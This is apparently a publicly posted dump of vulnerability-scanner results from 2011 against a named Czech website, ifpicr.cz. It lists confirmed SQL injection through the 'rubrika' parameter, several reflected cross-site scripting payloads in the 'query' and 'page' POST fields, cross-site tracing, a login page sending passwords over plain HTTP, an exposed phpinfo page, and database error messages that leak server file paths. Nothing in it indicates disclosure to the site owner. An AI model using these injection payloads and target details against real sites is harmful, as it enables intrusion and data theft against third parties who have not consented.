sroub3k

ifpicr.cz

Oct 7th, 2011
[High Possibility] SQL Injection

Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL: http://www.ifpicr.cz/?rubrika=%27

http://www.ifpicr.cz/?rubrika=%27&page=homepage
http://www.ifpicr.cz/index.php?rubrika=%27&page=homepage
http://www.ifpicr.cz/index.php?rubrika=%27

|||

Cross-site Scripting - XSS

Cross Site Scripting was found at: "http://www.ifpicr.cz/index.php", using HTTP method POST.
The sent post-data was: "query=<SCrIPT>alert("Je tu XSS :)")</SCrIPT>&page=search".
The modified parameter was "query".
This vulnerability affects ALL browsers.
This vulnerability was found in the request with id 274.

Cross Site Scripting was found at: "http://www.ifpicr.cz/index.php", using HTTP method POST.
The sent post-data was: "query=Hello+World&page=<SCrIPT>alert("mQsW")</SCrIPT>".
The modified parameter was "page".
This vulnerability affects ALL browsers.
This vulnerability was found in the request with id 294.

The web server at "http://www.ifpicr.cz/" is vulnerable to Cross Site Tracing.
This vulnerability was found in the request with id 314.

Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Vulnerable URL: http://www.ifpicr.cz/index.php
Parameter Name: page
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x000086)</script>

Vulnerable URL: http://www.ifpicr.cz/index.php
Parameter Name: page
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x00013E)</script>

Vulnerable URL: http://www.ifpicr.cz/index.php
Parameter Name: query
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x00036C)</script>

Vulnerable URL : http://www.ifpicr.cz/index.php
Parameter Name: query
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x000423)</script>

|||

Password Transmitted Over HTTP

Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
Vulnerable URL: http://www.ifpicr.cz/hitparadask/login.php

|||

phpinfo() Information Disclosure

Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
Vulnerable URL: http://www.ifpicr.cz/phpinfo.php

|||

Programming Error Message

Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209

Vulnerable URL: http://www.ifpicr.cz/?rubrika=%27

Identified Error Message: <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/inc/fce.php</b> on line <b>157</b>
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/inc/fce.php</b> on line <b>189</b>
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/pages/clanky.php</b> on line <b>7</b>

Parameter Name: rubrika
Parameter Type: Querystring
Attack Pattern: %27

-----------